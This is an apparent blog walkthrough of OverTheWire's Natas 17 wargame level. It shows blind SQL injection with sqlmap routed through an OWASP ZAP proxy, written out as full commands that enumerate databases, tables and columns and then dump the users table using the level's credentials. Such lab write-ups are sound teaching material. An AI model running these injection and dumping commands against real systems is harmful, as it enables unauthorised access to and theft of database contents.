Natas 17 — Blind SQL Injection with SQLMap
Welcome back to Natas’s series. Let’s take a look at Natas 17. Before jumping in, open OWASP ZAP and use the browser configure through it, that way you’ll get that fantastic HUD.
Let’s use that HUD. First, set your scope to ‘natas17’ using the top left button (Out):
This way we’re preparing ZAP to capture the requests and responses that matter to us. Now, getting back to our level, seems like we’re back at Natas 15. We’ll deal with it like we did before, getting some input in the box and reading the output. Trying ‘natas17’… nothing. Trying ‘natas18'… nothing. We could take a look at the source-code to determine what is going on behind the curtains, but not now.
What do we know so far? We have a form with an input text that doesn’t give and output. Could it be vulnerable? Let’s take a look at the requests and see how can we use them for SQLmap:
Open a terminal window and write the SQLMap command with parameters:
$ sqlmap -u “http://natas17.natas.labs.overthewire.org/index.php" --proxy=http://127.0.0.1:8080 --data=username=natas17 --auth-type=basic --auth-cred=natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
Let’s break things down:
- -u “http://natas17.natas.labs.overthewire.org/index.php”: it’s the natas 17 url
- --proxy=http://127.0.0.1:8080: we’re using ZAP as http proxy. This way we can take a look at the requests
- --data=username=natas17: username is the POST parameter we’re testing
- --auth-type=basic: authentication type
- --authe-cred=natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw: username/password of our current level
Press ‘enter’ and wait…
Ok, we’ll try --level=5 and --risk=3:
sqlmap -u “http://natas17.natas.labs.overthewire.org/index.php" --proxy=http://127.0.0.1:8080 --data=username=natas18 --auth-type=basic --auth-cred=natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw --level=5 --risk=3
This will take some time.
We could add one more parameter, the ‘--dbms=mysql’ since we know it’s the DBMS used.
Finally. Let’s list the databases, add the ‘--dbs’ param:
Now we’re going to determine the tables: -D natas17 --tables:
And the columns: -D natas17 -T users --columns:
The exploring time it’s over. It’s time to get our prize:
$ sqlmap -u “http://natas17.natas.labs.overthewire.org/index.php"--proxy=http://127.0.0.1:8080 --data=username=natas18 --auth-type=basic --auth-cred=natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw --level=5 --risk=3 --dbms=mysql -D natas17 -T users --dump
Finally we got the flag. Natas 18 is up next.